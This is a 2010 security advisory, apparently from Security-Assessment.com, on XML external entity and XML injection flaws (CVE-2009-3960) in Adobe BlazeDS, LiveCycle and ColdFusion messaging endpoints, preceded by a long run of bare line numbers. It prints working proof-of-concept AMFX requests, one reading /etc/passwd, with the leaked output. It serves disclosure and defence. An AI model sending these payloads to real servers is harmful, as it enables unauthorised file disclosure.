1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344 | ( , ) (,
. `.' ) ('. ',
). , ('. ( ) (
(_,) .`), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_='`"``=.
presents..
Multiple Adobe Products
XML External Entity And XML Injection Vulnerabilities
CVE: CVE-2009-3960
Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html
Link: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+-----------+
|Description|
+-----------+
Security-Assessment.com discovered that multiple Adobe
products with different Data Services versions are
vulnerable to XML External Entity (XXE) and XML
injection attacks.
XML external Entities injection allows a wide range of
XML based attacks, including local file disclosure,
TCP scans and Denial of Service condition, which can
be achieved by recursive entity injection, attribute
blow up and other types of injection.
For more information about the implications associated
to this vulnerability, refer to the RFC2518 (17.7
Implications of XML External Entities):
http://www.ietf.org/rfc/rfc2518.txt
+--------------+
|Product Review|
+--------------+
Adobe Data Services components provide Flex/RIA
applications with data messaging, remoting and
management capabilities.
The discovered vulnerabilities affect the HTTPChannel
servlet classes which are respectively
“mx.messaging.channels.HTTPChannel” and
“mx.messaging.channels.SecureHTTPChannel”. These
classes are part of the Data Services Messaging
classes and can be found in the
flex-messaging-common.jar Java archive.
The HTTPChannel transports data in the AMFX format,
which is the text-based XML representation of AMF.
The HTTPChannel endpoints are defined in the
services-config.xml file, located within the
Flex/WEB-INF folder of the application.
By default, the HTTPChannel classes are mapped to
the following endpoints:
1. http://{server.name}:{server.port}/{context.root}/messagebroker/http
2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure
Note that the HTTPChannel may be mapped to different
endpoints.
This depends on the deployed application and the
framework in use (e.g. BlazeDS, Adobe LiveCycle
Data Services, etc.).
+--------------------------------------------+
|Exploitation - XML External Entity Injection|
+--------------------------------------------+
XML entities can be declared and included within AMFX
requests passed to the HTTPChannel. The XML parser
parses the payload and successfully processes
injected entities.
The following table shows an example of XML external
entity injection which leads to local file disclosure.
The AMFX request is sent via the HTTPChannel endpoint
in BlazeDS.
XML External Entity Injection – Local File Disclosure
PoC – BlazeDS – Request
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
XML External Entity Injection – Local File Inclusion
PoC – BlazeDS – Response
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">
<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>
<body targetURI="/onResult" responseURI="">
<object type="flex.messaging.messages.AcknowledgeMessage">
<traits><string>timestamp</string><string>headers</string>
<string>body</string><string>correlationId</string>
<string>messageId</string><string>timeToLive</string>
<string>clientId</string><string>destination</string>
</traits><double>1.257387140632E12</double><object>
<traits><string>DSMessagingVersion</string>
<string>DSId</string></traits><double>1.0</double>
<string>BDE929FE-270D-3B56-1061-616E8B938429</string>
</object><null/><string>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
[...]
The above injection was successfully tested on
multiple Adobe products, as shown below:
1. Product: Adobe BlazeDS 3.2.0.39
Linux Ubuntu 9.04 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
2. Adobe LiveCycle Data Services ES2 3.0
Windows XP SP2 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
3. ColdFusion 9.0
Windows XP SP2 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/flex2gateway/http
{server.name}:{server.port}/
{context.root}/flex2gateway/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
4. Adobe LiveCycle ES2
Windows XP SP2 / IBM Websphere 7.0
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
The vendor has released several patches for this
vulnerability. See the Solution section of this
document for more information.
+----------------------------+
|Exploitation - XML Injection|
+----------------------------+
The XML parser lacks of proper input and output
validation controls. Security-Assessment.com managed
to inject arbitrary XML content which was returned
in the XML response.
The following table shows an XML injection in the
BlazeDS HTTPChannel. The injected payload becomes
part of the response. In this case, injection is
possible via the “responseURI” attribute.
XMLInjection – BlazeDS - Request
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="" responseURI="d" injectedattr="anything"><null/>
</body></amfx>
XMLInjection – BlazeDS - Response
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>
The above injection was successfully tested on
multiple Adobe products, as shown below:
1. Product: Adobe BlazeDS 3.2.0.39
Linux Ubuntu 9.04 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
2. Adobe LiveCycle Data Services ES2 3.0
Windows XP SP2 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
3. ColdFusion 9.0
Windows XP SP2 / Tomcat 6.0.14
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/flex2gateway/http
{server.name}:{server.port}/
{context.root}/flex2gateway/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
4. Adobe LiveCycle ES2
Windows XP SP2 / IBM Websphere 7.0
Endpoint URIs:
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
Methods: POST, GET
Protocols: HTTP, HTTPS
The vendor has released several patches for this
vulnerability. See the Solution section of this
document for more information.
+--------+
|Solution|
+--------+
Security-Assessment.com follows responsible
disclosure and promptly contacted the vendor after
discovering the issues. The vendor was contacted on
the 6th November 2009 and a reply was received on the
same day. The vendor released security patches on
the 11th February 2010.
The security patches can be downloaded at the
following website:
http://www.adobe.com/support/security/bulletins/apsb10-05.html
+------+
|Credit|
+------+
Discovered and advised to Adobe in
November 2009 by Roberto Suggi Liverani of Security-
Assessment.com. Personal Page: http://malerisch.net/
For full details regarding this vulnerability
download the PDF from our website:
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+---------+
|Greetings|
+---------+
Bug found at Hack in The Sun 2009, Waiheke Island.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a New Zealand based world
leader in web application testing, network security
and penetration testing. Security-Assessment.com
services organisations across New Zealand, Australia,
Asia Pacific, the United States and the United
Kingdom.
Roberto Suggi Liverani
|